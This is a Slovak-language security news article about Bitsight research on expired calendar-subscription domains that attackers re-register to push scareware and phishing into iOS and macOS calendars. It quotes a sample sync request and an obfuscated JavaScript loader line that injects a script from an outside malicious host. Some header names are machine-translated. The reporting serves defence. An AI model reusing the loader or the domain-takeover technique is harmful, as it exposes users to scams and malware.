Digitálne kalendáre sa stali nepostrádateľnými nástrojmi na správu osobných a profesionálnych plánov. Používatelia sa často prihlasujú na odber externých kalendárov pre štátne sviatky, športové plány alebo komunitné udalosti, aby mali svoje programy aktuálne.
Hoci tieto predplatné ponúkajú pohodlie, vytvárajú trvalé spojenie medzi zariadením používateľa a externým serverom.
Ak je doména hosťujúca kalendár opustená a následne vyprší, otvára to nebezpečnú zraniteľnosť.
Kyberzločinci môžu tieto domény, ktorých platnosť vypršala, preregistrovať, čím efektívne ukradnú dôveru založenú pôvodným predplatným.
Vektor útoku je obzvlášť zákerný, pretože nevyžaduje žiadnu novú akciu od obete. Zariadenie používateľa naďalej vykonáva požiadavky na synchronizáciu na pozadí do domény, ktorá je teraz škodlivá.
Útočníci potom môžu preniesť rôzne hrozby priamo do rozhrania kalendára, od scareware, ktorý napodobňuje systémové bezpečnostné výstrahy, až po phishingové odkazy maskované ako exkluzívne ponuky.
Táto metóda obchádza tradičné e-mailové filtre a využíva implicitnú dôveru, ktorú používatelia vkladajú do svojich nástrojov osobného plánovania, na poskytovanie škodlivého obsahu.
Bezpečnostní analytici Bitsight identifikovali túto vznikajúcu hrozbu po preskúmaní jedinej podozrivej domény distribuujúcej sviatočné udalosti.
Ich hlboký ponor odhalil rozľahlú sieť viac ako 390 opustených domén, ktoré aktívne prijímali žiadosti o synchronizáciu.
Ďalšia analýza ukázala, že tieto domény komunikovali s približne 4 miliónmi jedinečných IP adries denne, predovšetkým zo zariadení iOS a macOS.
Reťazec infekcie a presmerovania (zdroj – Bitsight)
Táto masívna škála poukazuje na to, ako jednoduchá zlyhaná registrácia domény môže vystaviť milióny používateľov potenciálnemu kompromisu bez ich vedomia.
Technické členenie synchronizačnej prevádzky
Vyšetrovanie odhalilo špecifické technické vzory, ktoré uľahčujú toto využívanie. Prevádzka je charakterizovaná požiadavkami HTTP, kde hlavička Accept signalizuje pripravenosť zariadenia na analýzu súborov kalendára.
Prevádzkový prehľad a potenciálne riziká (zdroj – Bitsight)
Reťazec User-Agent, ktorý zvyčajne obsahuje identifikátor démona, explicitne identifikuje zdroj ako systém iOS Calendar, čo potvrdzuje, že požiadavka je proces na pozadí a nie návšteva prehliadača iniciovaná používateľom.
GET /(URI)
Hostiteľ: (Target_Domain)
User-Agent: iOS/17.5.1 (21F90) dataaccessd/1.0
Prijať: text/kalendár
Výskumníci kategorizovali škodlivý prenos do dvoch hlavných typov: Base64-kódované URI a Webcal požiadavky.
Súbor .ics kalendára vrátený aktívnou doménou (zdroj – Bitsight)
Ako je vidieť na obrázku vyššie, že súbor Calendar .ics vrátil aktívna doména, server odpovedá súborom iCalendar, ktorý môže obsahovať manipulované údaje udalostí.
Okrem toho základná infraštruktúra často používa silne zmätený JavaScript na vykonanie hlbších kompromisov.
Útržok kódu nižšie ukazuje, ako sa užitočné zaťaženie dynamicky vkladá do modelu objektu dokumentu stránky, aby sa inicioval reťazec presmerovania:-
_0x407c32.src = „https://render.linetowaystrue.com/jRQxhz“;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(_0x407c32, document.currentScript);
}
Tento skript, akonáhle je deobfuskovaný, odhaľuje mechanizmus používaný na načítanie ďalšieho škodlivého obsahu, čo často vedie používateľov k podvodom.
Pochopením týchto odlišných dopravných podpisov a správania skriptov môžu odborníci na bezpečnosť lepšie identifikovať a blokovať tento skrytý vektor útoku.
Sledujte nás na Google News, LinkedIn a X a získajte ďalšie okamžité aktualizácie, nastavte CSN ako preferovaný zdroj v Google.
